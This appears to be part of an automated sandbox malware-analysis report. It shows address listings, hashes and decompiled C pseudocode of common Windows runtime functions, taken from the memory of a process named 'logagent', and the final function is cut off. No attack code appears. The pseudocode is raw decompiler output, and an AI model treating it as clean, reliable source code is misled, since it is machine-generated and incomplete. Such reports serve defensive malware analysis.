                                              0x05227ab2
                                              0x05227ab3
                                              0x05227ab5
                                              0x05227aec
                                              0x05227aef
                                              0x05227b25
                                              0x05227b28
                                              0x05227b62
                                              0x05227b64
                                              0x05227b8f
                                              0x05227b92
                                              0x05227b96
                                              0x05227b98
                                              0x00000000
                                              0x00000000
                                              0x05227b9e
                                              0x05227b9f
                                              0x05227ba3
                                              0x00000000
                                              0x05227ba3
                                              0x05227b66
                                              0x05227b68
                                              0x05227ae2
                                              0x05227ae2
                                              0x00000000
                                              0x05227ae2
                                              0x05227b6e
                                              0x05227b72
                                              0x05227b75
                                              0x05227b81
                                              0x05227b85
                                              0x05227b87
                                              0x00000000
                                              0x00000000
                                              0x05227b31
                                              0x05227b34
                                              0x05227b3c
                                              0x05227b45
                                              0x05227b46
                                              0x05227b4f
                                              0x05227b51
                                              0x05227b57
                                              0x05227b59
                                              0x05227b59
                                              0x00000000
                                              0x05227b59
                                              0x05227b77
                                              0x00000000
                                              0x05227b77
                                              0x05227b2a
                                              0x00000000
                                              0x05227b2a
                                              0x05227af1
                                              0x05227af3
                                              0x00000000
                                              0x00000000
                                              0x05227afb
                                              0x05227afc
                                              0x05227afe
                                              0x00000000
                                              0x00000000
                                              0x05227b00
                                              0x05227b03
                                              0x00000000
                                              0x00000000
                                              0x05227b05
                                              0x05227b09
                                              0x05227b0d
                                              0x05227b0f
                                              0x00000000
                                              0x00000000
                                              0x05227b18
                                              0x05227b1d
                                              0x00000000
                                              0x05227b1d
                                              0x05227ab7
                                              0x05227ab9
                                              0x00000000
                                              0x00000000
                                              0x05227abf
                                              0x05227ac1
                                              0x00000000
                                              0x00000000
                                              0x05227ac3
                                              0x05227ac6
                                              0x00000000
                                              0x00000000
                                              0x05227ac8
                                              0x05227acc
                                              0x05227ad0
                                              0x05227ad2
                                              0x00000000
                                              0x00000000
                                              0x05227adb
                                              0x00000000
                                              0x05227adb
                                              0x052279d6
                                              0x052279d9
                                              0x052279dc
                                              0x05227a91
                                              0x05227a94
                                              0x00000000
                                              0x05227a94
                                              0x052279e2
                                              0x00000000
                                              0x052279e2
                                              0x05227a74
                                              0x05227a7a
                                              0x00000000
                                              0x00000000
                                              0x05227a8a
                                              0x05227a21
                                              0x05227a21
                                              0x00000000
                                              0x05227a21
                                              0x051bc650
                                              0x051bc651
                                              0x051bc656
                                              0x051bc65c
                                              0x051bc65d
                                              0x051bc663
                                              0x051bc664
                                              0x051bc66a
                                              0x051bc66e
                                              0x052279c5
                                              0x052279c7
                                              0x00000000
                                              0x052279c7
                                              0x051bc67a
                                              0x00000000
                                              0x00000000
                                              0x00000000

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6494440cd4d59bfb788973a8f58e540637277decc63712838c027825d3543d4f
                                              • Instruction ID: 733e57a446d0938a8841d8fa70b4db03bfffa30ffb56b532b8e9e48d7ab17cce
                                              • Opcode Fuzzy Hash: 6494440cd4d59bfb788973a8f58e540637277decc63712838c027825d3543d4f
                                              • Instruction Fuzzy Hash: 2381617966C212ABDB25CE14C880F7BB7E5FF84364F18486AED499B241D370DD41CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0527DBD2 Relevance: .2, Instructions: 212COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 93%
                                              			E0527DBD2(intOrPtr* __ecx, unsigned int __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v5;
				signed short _v12;
				unsigned int _v16;
				intOrPtr* _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				signed short _v40;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int* _t75;
				signed short _t77;
				intOrPtr _t78;
				signed int _t92;
				signed int _t98;
				signed int _t99;
				signed short _t105;
				unsigned int _t108;
				void* _t112;
				unsigned int _t119;
				signed int _t124;
				intOrPtr _t137;
				signed char _t139;
				signed int _t140;
				unsigned int _t141;
				signed char _t142;
				intOrPtr _t152;
				signed int _t153;
				signed int _t158;
				signed int _t159;
				intOrPtr _t172;
				signed int _t176;
				signed int _t178;
				signed short _t182;
				intOrPtr _t183;

				_t119 = __edx;
				_v20 = __ecx;
				_t152 = _a4;
				_t172 = 0;
				_t182 = __edx >> 0x0000000c ^  *(__edx + 0x18) ^  *0x52a6114;
				_v16 = __edx;
				_v36 = 0;
				_v5 = 0xff;
				_v40 = _t182;
				_v24 = _t182 >> 0x10;
				if(_t152 == 0) {
					L14:
					_t124 =  *(_t119 + 0x12) & 0x0000ffff;
					_v24 = _t124;
					_t183 = _v36;
					_t53 = _t119 + 0x10; // 0x10
					_t75 = _t53;
					_v28 = _t75;
					_t77 =  *_t75 & 0x0000ffff;
					_v12 = _t77;
					L15:
					while(1) {
						if(_t183 != 0) {
							L20:
							_t153 = _t77 + 0x00000001 & 0x0000ffff;
							asm("lock cmpxchg [ebx], cx");
							_t119 = _v16;
							_t77 = _t77 & 0x0000ffff;
							_v12 = _t77;
							if(_t153 == (_t77 & 0x0000ffff) + 1) {
								if(_t77 == 0) {
									_t78 = _t172;
									L27:
									_t119 = E0527D016(_t119, _t183, _t119, _t78);
									E051CFFB0(_t119, _t172, _t183 + 8);
									_t183 = _t172;
									if(_t119 != 0) {
										E0527C52D(_v20,  *((intOrPtr*)(_v20 + 0x78 + ( *(((_v40 & 0x0000ffff) + 7 >> 3) + 0x519aff8) & 0x000000ff) * 4)), _t119, _a8);
									}
									L29:
									_t172 = 1;
									if(_t183 != 0) {
										_t72 = _t183 + 8; // 0x8
										E051CFFB0(_t119, 1, _t72);
									}
									L31:
									return _t172;
								}
								if((_t77 & 0x0000ffff) != _v24 - 1) {
									goto L29;
								}
								_t78 = 2;
								goto L27;
							}
							_t124 = _v24;
							continue;
						}
						if(_t77 == 0 || (_t77 & 0x0000ffff) == _t124 - 1) {
							_t183 = E0527E018(_t119,  &_v5);
							if(_t183 == 0) {
								_t172 = 1;
								goto L31;
							}
							goto L19;
						} else {
							L19:
							_t77 = _v12;
							goto L20;
						}
					}
				}
				_t92 = _t182 & 0x0000ffff;
				_v28 = _t92;
				_t137 =  *((intOrPtr*)(__ecx + 0x78 + ( *((_t92 + 7 >> 3) + 0x519aff8) & 0x000000ff) * 4));
				_t98 =  *((intOrPtr*)(_t137 + 0x24));
				_t158 = _t152 - (_v24 & 0x0000ffff) - __edx;
				_v24 = _t98;
				_t99 = _t158;
				_v32 = _t158;
				_t139 =  *(_t137 + 0x28) & 0x000000ff;
				if(_t98 == 0) {
					_v12 = _t99 >> _t139;
					_t159 = _t158 & (1 << _t139) - 0x00000001;
					_t105 = _v12;
				} else {
					_t105 = E051FD340(_t99 * _v24, _t139, _t99 * _v24 >> 0x20);
					_v12 = _t105;
					_t159 = _v32 - _v28 * _t105;
				}
				if(_t159 == 0) {
					_t140 =  *(_t119 + 0x14) & 0x0000ffff;
					if(_t140 >= _t105) {
						_t140 = _t105 & 0x0000ffff;
					}
					 *(_t119 + 0x14) = _t140;
					_t141 = _t105 + _t105;
					_t142 = _t141 & 0x0000001f;
					_t176 = 3;
					_t178 =  !(_t176 << _t142);
					_t108 =  *(_t119 + (_t141 >> 5) * 4 + 0x20);
					do {
						asm("lock cmpxchg [ebx], edx");
					} while ((_t108 & _t178) != 0);
					if((_t108 >> _t142 & 0x00000001) != 0) {
						_t119 = _v16;
						_t172 = 0;
						if( *((char*)(_t119 + 0x1d)) > 1) {
							_t112 = E0527D864(_t119, _a4 - _t119, _t182 & 0x0000ffff, 0,  &_v32);
							_t184 = _t112;
							if(_t112 != 0xffffffff) {
								asm("lock xadd [ecx], edx");
								E0527D8DF(_v20, _t119, _t184, 2, _a8);
							}
						}
						goto L14;
					}
					_push(_t142);
					_push(_v12);
					E0527A80D( *_v20, 0x11, _a4, _v16);
					_t172 = 0;
				}
			}








































                                              0x0527dbdc
                                              0x0527dbde
                                              0x0527dbe1
                                              0x0527dbed
                                              0x0527dbef
                                              0x0527dbf7
                                              0x0527dbfd
                                              0x0527dc00
                                              0x0527dc04
                                              0x0527dc07
                                              0x0527dc0c
                                              0x0527dd1f
                                              0x0527dd1f
                                              0x0527dd23
                                              0x0527dd26
                                              0x0527dd29
                                              0x0527dd29
                                              0x0527dd2c
                                              0x0527dd32
                                              0x0527dd35
                                              0x00000000
                                              0x0527dd38
                                              0x0527dd3a
                                              0x0527dd5d
                                              0x0527dd63
                                              0x0527dd69
                                              0x0527dd6e
                                              0x0527dd71
                                              0x0527dd78
                                              0x0527dd7d
                                              0x0527dd8c
                                              0x0527dd9e
                                              0x0527dda0
                                              0x0527ddad
                                              0x0527ddb0
                                              0x0527ddb5
                                              0x0527ddb9
                                              0x0527ddd9
                                              0x0527ddd9
                                              0x0527ddde
                                              0x0527dde0
                                              0x0527dde3
                                              0x0527dde5
                                              0x0527dde9
                                              0x0527dde9
                                              0x0527ddee
                                              0x0527ddf6
                                              0x0527ddf6
                                              0x0527dd97
                                              0x00000000
                                              0x00000000
                                              0x0527dd9b
                                              0x00000000
                                              0x0527dd9b
                                              0x0527dd7f
                                              0x00000000
                                              0x0527dd7f
                                              0x0527dd3f
                                              0x0527dd54
                                              0x0527dd58
                                              0x0527dd86
                                              0x00000000
                                              0x0527dd86
                                              0x00000000
                                              0x0527dd5a
                                              0x0527dd5a
                                              0x0527dd5a
                                              0x00000000
                                              0x0527dd5a
                                              0x0527dd3f
                                              0x0527dd38
                                              0x0527dc12
                                              0x0527dc15
                                              0x0527dc25
                                              0x0527dc31
                                              0x0527dc34
                                              0x0527dc3b
                                              0x0527dc3e
                                              0x0527dc40
                                              0x0527dc43
                                              0x0527dc46
                                              0x0527dc62
                                              0x0527dc6b
                                              0x0527dc6d
                                              0x0527dc48
                                              0x0527dc4b
                                              0x0527dc59
                                              0x0527dc5c
                                              0x0527dc5c
                                              0x0527dc72
                                              0x0527dc78
                                              0x0527dc7f
                                              0x0527dc81
                                              0x0527dc81
                                              0x0527dc84
                                              0x0527dc88
                                              0x0527dc8d
                                              0x0527dc95
                                              0x0527dc9b
                                              0x0527dca0
                                              0x0527dca2
                                              0x0527dca6
                                              0x0527dca6
                                              0x0527dcb0
                                              0x0527dcd1
                                              0x0527dcd4
                                              0x0527dcda
                                              0x0527dcec
                                              0x0527dcf1
                                              0x0527dcf6
                                              0x0527dd0c
                                              0x0527dd1a
                                              0x0527dd1a
                                              0x0527dcf6
                                              0x00000000
                                              0x0527dcda
                                              0x0527dcb5
                                              0x0527dcb6
                                              0x0527dcc5
                                              0x0527dcca
                                              0x0527dcca

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 06010b37ce41638f925a7a857c4ca79d4723b386f133b99ca70572223988f163
                                              • Instruction ID: 00c51e1618003040b1caacc400b23cb2e5fbe25990be0029e9b5a4fdc679f61c
                                              • Opcode Fuzzy Hash: 06010b37ce41638f925a7a857c4ca79d4723b386f133b99ca70572223988f163
                                              • Instruction Fuzzy Hash: 5F71E9B6E1012E9FCB14DF69C4809BEB7F6FF88310B154169E855EB344D634DA46C7A0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05236DC9 Relevance: .2, Instructions: 199COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 79%
                                              			E05236DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L051D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E05236B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E051D7D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E051F9AE0();
					_t87 = L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E0523795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E0523795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E0523795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E0523795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L051D4620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E05236B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E05236B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E05236B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E05236B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E051D7D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E051F9AE0();
								L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L051D2400( &_v36);
							if(_v24 >= 0) {
								_t87 = L051D2400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L051D2400( &_v52);
							}
							if(_v28 >= 0) {
								return L051D2400( &_v60);
							}
						}
					}
				}
				return _t87;
			}































                                              0x05236dd4
                                              0x05236dde
                                              0x05236de1
                                              0x05236de3
                                              0x05236de6
                                              0x05236de9
                                              0x05236dec
                                              0x05236def
                                              0x05236df2
                                              0x05236df5
                                              0x05236dfe
                                              0x05236e04
                                              0x05236e09
                                              0x05236e0d
                                              0x05236e18
                                              0x05236e1b
                                              0x05236e22
                                              0x05236e2d
                                              0x05236e30
                                              0x05236e36
                                              0x05236e42
                                              0x05236e4d
                                              0x05236e50
                                              0x05236e55
                                              0x05236e5c
                                              0x05236e6e
                                              0x05236e5e
                                              0x05236e67
                                              0x05236e67
                                              0x05236e73
                                              0x05236e74
                                              0x05236e77
                                              0x05236e7c
                                              0x05236e7d
                                              0x05236e8e
                                              0x05236e93
                                              0x05236e9c
                                              0x05236ea8
                                              0x05236eab
                                              0x05236eac
                                              0x05236eb3
                                              0x05236ecd
                                              0x05236edc
                                              0x05236ee2
                                              0x05236ee5
                                              0x05236ef2
                                              0x05236efb
                                              0x05236f01
                                              0x05236f06
                                              0x05236f0b
                                              0x05236f11
                                              0x05236f1a
                                              0x05236f22
                                              0x05236f26
                                              0x05236f26
                                              0x05236f33
                                              0x05236f41
                                              0x05236f44
                                              0x05236f47
                                              0x05236f54
                                              0x05236f65
                                              0x05236f77
                                              0x05236f7c
                                              0x05236f82
                                              0x05236f91
                                              0x05236f99
                                              0x05236fa3
                                              0x05236fae
                                              0x05236fae
                                              0x05236fba
                                              0x05236fbb
                                              0x05236fbc
                                              0x05236fc1
                                              0x05236fc2
                                              0x05236fd3
                                              0x05236fd8
                                              0x05236fd8
                                              0x05236fdf
                                              0x05236fe8
                                              0x05236fee
                                              0x05236fee
                                              0x05236ff5
                                              0x05236ffb
                                              0x05236ffb
                                              0x05237004
                                              0x00000000
                                              0x0523700a
                                              0x05237004
                                              0x05236eb3
                                              0x05236e9c
                                              0x05237015

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                              • Instruction ID: c43e5fff6c111135f0e474591f7040a5f57deed1eca718019a58d5416d536a2e
                                              • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                              • Instruction Fuzzy Hash: CC718DB1A10219EFCB11DFA4C984EEEFBB9FF48310F144169E505E7251DB34AA41CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0524B8D0 Relevance: .2, Instructions: 199COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 39%
                                              			E0524B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x52a7b9c; // 0x0
				_t124 = L051D4620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E051F9800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E051F95B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E051F95D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L051D77F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E051F9910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E051F95D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x52a7b9c; // 0x0
									_t92 = L051D4620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E051F9910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E051BA7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E0524E7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E0524E7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E051F95B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}




















                                              0x0524b8d9
                                              0x0524b8e4
                                              0x00000000
                                              0x0524b8e6
                                              0x0524b8f3
                                              0x0524b8f5
                                              0x0524b8f5
                                              0x0524b8f8
                                              0x0524b920
                                              0x0524b924
                                              0x0524b936
                                              0x0524b939
                                              0x0524b93d
                                              0x0524b948
                                              0x0524b9a0
                                              0x0524b9a0
                                              0x0524b9a4
                                              0x0524b9bf
                                              0x0524b9c4
                                              0x0524b9c6
                                              0x0524b9cd
                                              0x0524b9d1
                                              0x0524bad4
                                              0x0524bad8
                                              0x0524bada
                                              0x0524badc
                                              0x0524badc
                                              0x0524badf
                                              0x0524bae0
                                              0x0524bae2
                                              0x0524bae4
                                              0x0524baec
                                              0x0524baee
                                              0x0524baf0
                                              0x0524baf0
                                              0x0524baec
                                              0x0524bafb
                                              0x0524bafc
                                              0x0524bafe
                                              0x0524bb01
                                              0x0524bb01
                                              0x00000000
                                              0x0524bb06
                                              0x0524b9d7
                                              0x0524b9db
                                              0x0524b9db
                                              0x0524b9de
                                              0x0524b9de
                                              0x0524b9e4
                                              0x0524b9e7
                                              0x0524b9ea
                                              0x0524b9ec
                                              0x0524b9ef
                                              0x0524b9f3
                                              0x0524ba1b
                                              0x0524ba1b
                                              0x0524ba23
                                              0x0524ba24
                                              0x0524ba27
                                              0x0524ba2a
                                              0x0524ba2b
                                              0x0524ba2e
                                              0x0524ba30
                                              0x0524ba37
                                              0x0524ba3f
                                              0x0524ba9c
                                              0x0524baa2
                                              0x0524bb13
                                              0x0524bb15
                                              0x0524baae
                                              0x0524baae
                                              0x0524bab3
                                              0x0524bab5
                                              0x0524baba
                                              0x0524bac8
                                              0x0524bac8
                                              0x0524baba
                                              0x0524bacd
                                              0x0524bacf
                                              0x00000000
                                              0x0524bacf
                                              0x0524bb1a
                                              0x00000000
                                              0x0524bb1c
                                              0x0524baa7
                                              0x0524bb11
                                              0x00000000
                                              0x0524bb11
                                              0x0524baa9
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x0524ba41
                                              0x0524ba41
                                              0x0524ba41
                                              0x0524ba58
                                              0x0524ba5d
                                              0x0524ba62
                                              0x00000000
                                              0x00000000
                                              0x0524ba64
                                              0x0524ba67
                                              0x0524ba68
                                              0x0524ba69
                                              0x0524ba6c
                                              0x0524ba6f
                                              0x0524ba71
                                              0x0524ba78
                                              0x0524ba80
                                              0x00000000
                                              0x00000000
                                              0x0524ba90
                                              0x0524ba90
                                              0x0524ba97
                                              0x00000000
                                              0x0524ba97
                                              0x0524b9f5
                                              0x0524b9f7
                                              0x0524b9f7
                                              0x0524b9fa
                                              0x0524ba03
                                              0x0524ba07
                                              0x0524ba0c
                                              0x0524ba10
                                              0x0524ba17
                                              0x00000000
                                              0x0524b9f7
                                              0x0524b9a6
                                              0x0524b9a8
                                              0x0524b9af
                                              0x0524b9b3
                                              0x00000000
                                              0x00000000
                                              0x0524b9b9
                                              0x00000000
                                              0x0524b9b9
                                              0x0524b94d
                                              0x0524b98f
                                              0x0524b995
                                              0x0524b999
                                              0x0524b960
                                              0x0524b967
                                              0x0524b968
                                              0x0524b96a
                                              0x00000000
                                              0x0524b96a
                                              0x0524b99b
                                              0x0524b99e
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x0524b99e
                                              0x0524b951
                                              0x0524b954
                                              0x0524b95a
                                              0x0524b95e
                                              0x0524b972
                                              0x0524b979
                                              0x0524b97d
                                              0x0524b97f
                                              0x0524b980
                                              0x0524b982
                                              0x0524b984
                                              0x00000000
                                              0x0524b984
                                              0x00000000
                                              0x0524b926
                                              0x00000000
                                              0x0524b926

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3b987842d80c70ecf9ed83c7bffd4d13e62b26174c619ef6a7d04108c82f650b
                                              • Instruction ID: cb2199857262c5cd747df15a95d12cb9dafb4508c533e2e1ef3f172f846f493d
                                              • Opcode Fuzzy Hash: 3b987842d80c70ecf9ed83c7bffd4d13e62b26174c619ef6a7d04108c82f650b
                                              • Instruction Fuzzy Hash: 87710632210702AFDB39DF14C888F6AB7A6FF44710F154928E65A872E1DB75E944CF50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05271002 Relevance: .2, Instructions: 198COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E05271002(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _t75;
				intOrPtr* _t76;
				signed int _t77;
				signed short _t78;
				signed short _t80;
				signed int _t81;
				signed short _t82;
				signed short _t83;
				signed short _t85;
				signed int _t86;
				void* _t90;
				signed short _t91;
				signed int _t95;
				signed short _t97;
				signed short _t99;
				intOrPtr* _t101;
				signed short _t102;
				signed int _t103;
				signed short _t105;
				intOrPtr _t106;
				signed int* _t108;
				signed short _t109;
				signed short _t111;
				signed short _t112;
				signed int _t113;
				signed short _t117;
				signed int _t120;
				void* _t121;
				signed int _t122;
				signed int _t126;
				signed int* _t127;
				signed short _t128;
				intOrPtr _t129;
				intOrPtr _t130;
				signed int _t132;
				signed int _t133;

				_t121 = __edx;
				_t130 = __ecx;
				_v16 = __ecx;
				_t108 = __ecx + 0xa4;
				_t75 =  *_t108;
				L4:
				L4:
